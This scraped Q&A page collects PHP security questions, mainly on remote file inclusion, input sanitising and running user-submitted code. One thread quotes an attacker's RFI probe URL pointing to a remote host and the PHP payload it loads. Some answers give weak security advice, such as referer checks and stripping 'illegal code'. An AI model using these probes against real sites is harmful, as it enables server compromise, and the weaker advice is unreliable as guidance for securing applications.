PHP, RFI, and keeping things secure - php

I am working on a website which the good user inputs a website domain name, http://www.mysite.com.
But I have been reading about remote file inclusion (RFI), and it is pretty interesting. Simply by adding ?page=http://www.mysite.com/index.php? or something near that I get some type of error (500).
Other peoples sites using wordpress/ PHP if I do the same I also get an error.
I do not know if this means the script was run, but how can I keep my input clean? I already use REGEX, but I want the user to be able to input any website and process it accordingly. I certainly do not want significant security holes anywhere in my script.
Good night here in Boston on the East Coast [EST]

The HTTP 500 error you're seeing sounds like something that mod_security, a module for Apache, is generating. mod_security scans all input against a set of security rules, one of which probably is checking for RFI. This is a first line of defense.
To protect against RFI, there's a few other things you can do. First, since PHP 5.2.0, there is an option called allow_url_include. When set to false, this will cause PHP to throw an error whenever a file is being included that is an URL. Most people will want to have this setting set to false.
Additionally, there's sanitizing your input. There's a variety of ways to do it, indeed like using regex, but you could also look at the filter extension. Just be sure to be strict enough, you wouldn't want to allow someone to sneak in a ../../ and having a peek a level or two higher in the file hierarchy.
The safest, but sometimes also a very impractical, way to security file access would be to use a whitelist of the exact files that would be allowed to be included.

Related

Protecting against malicious users passing arrays as POST parameters into a PHP application

A user reported that changing our post request (directly using live http headers) from notes to notes[] broke our php application and also exposed our full path (error reporting on).
Short of going through our entire application and doing:
if(is_array($_POST['some_param'])) {
die("Invalid parameter");
}
Is there a better way to protect against this type of attack?
Testing for invalid values makes for a nasty game of cat and mouse. Try the opposite pattern where you proceed only on expected types.
In your scenario, test to see if $_POST['some_param'] represents a single text value and only then proceed with processing the request.
Checking the expected type being passed around is the best way to go about it.
http://php.net/manual/en/reserved.variables.post.php
Turning off error reporting in a production environment is always helpful. You can always check your error logs through what ever server you're using (Apache, nginx, etc).
As far as checking all post variables for if they are an array, if you're worried about it, you can always use your included header in all files to just iterate over your _POST variable and clean it up, this is called sanitizing your variables, there are many articles on the internet on how to go about this, here is an article that could help you understand this:
http://www.dreamhost.com/dreamscape/2013/05/22/php-security-user-validation-and-sanitization-for-the-beginner/
Sounds like you use notes in many different places, you don't have a single gateway (eg all routes through index.php), and you want to add some protection.
If so, I suggest using the auto_prepend_file configuration value to load in a script (call it say input-filters.php) that does something like:
$_POST = filter_input_array(INPUT_POST, [ 'notes' => FILTER_REQUIRE_SCALAR ]);
There's tons more you can do with filters, so do check out the examples.

How to secure sensitive PHP files that process Jquery data?

On my website, I have a search.php page that makes $.get requests to pages like search_data.php and search_user_data.php etc.
The problem is all of these files are located within my public html folder.
Even though someone could browse to www.mysite.com/search_user_data.php, all of the data processed is properly escaped and handled, but on a professional level this is inadequate to even have this file within public reach.
I have tried moving the sensitive files to my web root, however since Jquery is making $.get requests and passing variables in the URL, this doesn't work.
Does anyone know any methods to firmly secure these vulnerable pages?
What you describe is normal.
You have PHP files that are reachable in your www directory so apache (or your favored webserver) can read and process them.
If you move them out you can't reach them anymore so there is no real option of that sort.
After all your PHP files for AJAX are just regular php files, likely your other project also contains php files. Right ? They are not more or less at risk than any script on your server.
Make sure you program "clean". Think about evil requests when writing your php functions, not after writing them.
As you already did: correctly quote all incoming input that might hit a database or sensitive function.
You can add security checks on your incoming values and create an automated email if you detect someone trying evil stuff. So you'll likely receive a warning in such cases.
But on the downside: You'll regularly receive warnings because some companies automatically scan websites for possible bugs. So you will receive a warning on such scans as well.
On top of writing your code as "secure" as you can, you may want to add a referer check in your code. That means your PHP file will only react if your website was given as referer when accessing it. That's enough to block 80% of the kids out there.
But on the downside: a few internet users do not send a referer at all, some proxies filter that. (I personally would ignore them, half the (www) internet breaks on them anyway)
One more layer of protection can be added by htaccess, you can do most within PHP but it might still be of interest for you: http://httpd.apache.org/docs/2.0/howto/htaccess.html
You can store a uid each time your page is loaded and store it in $_SESSION['uid']. You give this uid to javascript by doing :
var uid = <?php print $_SESSION['uid']; ?>;
Then you pass it with your get request, compare it to your $_SESSION :
if($_GET['uid'] != $_SESSION['uid']) // Stop with an error message or send a forbidden header.
If it's ok, do what you need.
It's not perfect since someone can request search.php and get the current uid, and then request the other pages, but it may be the best possible solution.

No require, no include, no url rewriting, yet the script is executed without being in the url

I am trying to trace the flow of execution in some legacy code. We have a report being accessed with
http://site.com/?nq=showreport&action=view
This is the puzzle:
in index.php there is no $_GET['nq'] or $_GET['action'] (and no
$_REQUEST either),
index.php, or any sources it includes, do not include showreport.php,
in .htaccess there is no url-rewriting
yet, showreport.php gets executed.
I have access to cPanel (but no apache config file) on the server and this is live code I cannot take any liberty with.
What could be making this happen? Where should I look?
Update
Funny thing - sent the client a link to this question in a status update to keep him in the loop; minutes latter all access was revoked and client informed me that the project is cancelled. I believe I have taken enough care not to leave any traces to where the code actually is ...
I am relieved this has been taken off me now, but I am also itching to know what it was!
Thank you everybody for your time and help.
There are "a hundreds" ways to parse a URL - in various layers (system, httpd server, CGI script). So it's not possible to answer your question specifically with the information you have got provided.
You leave a quite distinct hint "legacy code". I assume what you mean is, you don't want to fully read the code, understand it even that much to locate the piece of the application in question that is parsing that parameter.
It would be good however if you leave some hints "how legacy" that code is: Age, PHP version targeted etc. This can help.
It was not always that $_GET was used to access these values (same is true for $_REQUEST, they are cousins).
Let's take a look in the PHP 3 manual Mirror:
HTTP_GET_VARS
An associative array of variables passed to the current script via the HTTP GET method.
Is the script making use of this array probably? That's just a guess, this was a valid method to access these parameter for quite some time.
Anyway, this must not be what you search for. There was this often misunderstood and mis-used (literally abused) feature called register globals PHP Manual in PHP. So you might just be searching for $nq.
Next to that, there's always the request uri and apache / environment / cgi variables. See the link to the PHP 3 manual above it lists many of those. Compare this with the current manual to get a broad understanding.
In any case, you might have grep or a multi file search available (Eclipse has a nice build in one if you need to inspect legacy code inside some IDE).
So in the end of the day you might just look for a string like nq, 'nq', "nq" or $nq. Then check what this search brings up. String based search is a good entry into a codebase you don't know at all.
I’d install xdebug and use its function trace to look piece by piece what it is doing.
EDIT:
Okay, just an idea, but... Maybe your application is some kind of include hell like application I’m sometimes forced to mess at work? One file includes another, it includes another and that includes original file again... So maybe your index file includes some file that eventually causes this file to get included?
Another EDIT:
Or, sometimes application devs didn’t know what is a $_GET variable and parsed the urls themselves -> doing manual includes based to based urls.
I don't know how it works, but I know that Wordpress/Silverstipe is using is own url-rewriting to parse url to find posts/tags/etc. So the url parsing maybe done in a PHP script.
Check your config files (php.ini and .htaccess), you may have auto_prepend_file set.
check your crontab, [sorry I don't know where you would find it in cpanel]
- does the script fire at a specific time or can you see it definitely fires only when you request a specific page?
-sean
EDIT:
If crontab is out, take a look at index.php [and it's includes] and look for code that either loops over the url parameters without specifically noting "nq" and anything that might be parsing the query string [probably something like: $_SERVER['QUERY_STRING'] ]
-sean
You should give debug_backtrace() (or debug_print_backtrace() a try. The output is similar to the output of an Exception-stacktrace, thus it should help you to find out, what is called when and from where. If you don't have the possibility to run the application on a local development system, make sure, that nobody else can see the output
Are you sure that you are looking at the right config or server? If you go the url above you get an error page that seems to indicate that the server is actually a microsoft iis server and not an apache one.

Best way to allow user to inject and run php code

I've been thinking for a while about the idea of allowing user to inject code on website and run it on a web server. It's not a new idea - many websites allow users to "test" their code online - such as http://ideone.com/.
For example: Let's say that we have a form containing <textarea> element in which that user enters his piece of code and then submits it. Server reads POST data, saves as PHP file and require()s it while being surrounded by ob_*() output buffering handlers. Captured output is presented to end user.
My question is: how to do it properly? Things that we should take into account [and possible solutions]:
security, user is not allowed to do anything evil,
php.ini's disable_functions
stability, user is not allowed to kill webserver submitting while(true){},
set_time_limit()
performance, server returns answer in an acceptable time,
control, user can do anything that matches previous points.
I would prefer PHP-oriented answers, but general approach is also welcome. Thank you in advance.
I would think about this problem one level higher, above and outside of the web server. Have a very unprivileged, jailed, chroot'ed standalone process for running these uploaded PHP scripts, then it doesn't matter what PHP functions are enabled or not, they will fail based on permissions and lack of access.
Have a parent process that monitors how long the above mentioned "worker" process has been running, if its been too long, kill it, and report back a timeout error to the end user.
Obviously there are many implementation details to work out as to how to run this system asynchronously outside of the browser request, but I think it would provide a pretty secure way to run your untrusted PHP scripts.
Wouldn't disabling functions in your server's ini file limit some of the functions of the application itself?
I think you have to do some hardcore sanitization on the POST data and strip "illegal" code there. I think doing that with the addition of the other methods you describe might make it work.
Just remember. Sanitize the everloving daylight out of that POST data.

What bug does this hacker want to exploit?

A guy called ShiroHige is trying to hacking my website.
He tries to open a page with this parameter:
mysite/dir/nalog.php?path=http://smash2.fileave.com/zfxid1.txt???
If you look at that text file it is just a die(),
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
So what exploit is he trying to use (WordPress?)?
Edit 1:
I know he is trying use RFI.
Is there some popular script that are exploitable with that (Drupal, phpBB, etc.)?
An obvious one, just unsanitized include.
He is checking if the code gets executed.
If he finds his signature in a response, he will know that your site is ready to run whatever code he sends.
To prevent such attacks one have to strictly sanitize filenames, if they happen to be sent via HTTP requests.
A quick and cheap validation can be done using basename() function:
if (empty($_GET['page']))
$_GET['page']="index.php";
$page = $modules_dir.basename($_GET['page']).".php";
if (!is_readable($page)) {
header("HTTP/1.0 404 Not Found");
$page="404.html";
}
include $page;
or using some regular expression.
There is also an extremely useful PHP configuration directive called
allow_url_include
which is set to off by default in modern PHP versions. So it protects you from such attacks automatically.
The vulnerability the attacker is aiming for is probably some kind of remote file inclusion exploiting PHP’s include and similar functions/construct that allow to load a (remote) file and execute its contents:
Security warning
Remote file may be processed at the remote server (depending on the file extension and the fact if the remote server runs PHP or not) but it still has to produce a valid PHP script because it will be processed at the local server. If the file from the remote server should be processed there and outputted only, readfile() is much better function to use. Otherwise, special care should be taken to secure the remote script to produce a valid and desired code.
Note that using readfile does only avoids that the loaded file is executed. But it is still possible to exploit it to load other contents that are then printed directly to the user. This can be used to print the plain contents of files of any type in the local file system (i.e. Path Traversal) or to inject code into the page (i.e. Code Injection). So the only protection is to validate the parameter value before using it.
See also OWASP’s Development Guide on “File System – Includes and Remote files” for further information.
It looks like the attack is designed to print out "ShiroHige" on vulnerable sites.
The idea being, that is you use include, but do not sanitize your input, then the php in this text file is executed. If this works, then he can send any php code to your site and execute it.
A list of similar files can be found here. http://tools.sucuri.net/?page=tools&title=blacklist&detail=072904895d17e2c6c55c4783df7cb4db
He's trying to get your site to run his file. This would probably be an XSS attack? Not quite familiar with the terms (Edit: RFI - Remote file inclusion).
Odds are he doesn't know what he's doing. If there’s a way to get into WordPress, it would be very public by now.
I think its only a first test if your site is vulnerable to external includes. If the echo is printed, he knows its possible to inject code.
You're not giving much detail on the situation and leaving a lot to the imagination.
My guess is that he's trying to exploit allow_url_fopen. And right now he's just testing code to see what he can do. This is the first wave!
I think it is just a malicious URL. As soon as i entered it into my browser, Avast antivirus claimed it to be a malicious url. So that php code may be deceiving or he may just be testing. Other possibility is that the hacker has no bad intentions and just want to show that he could get over your security.

Categories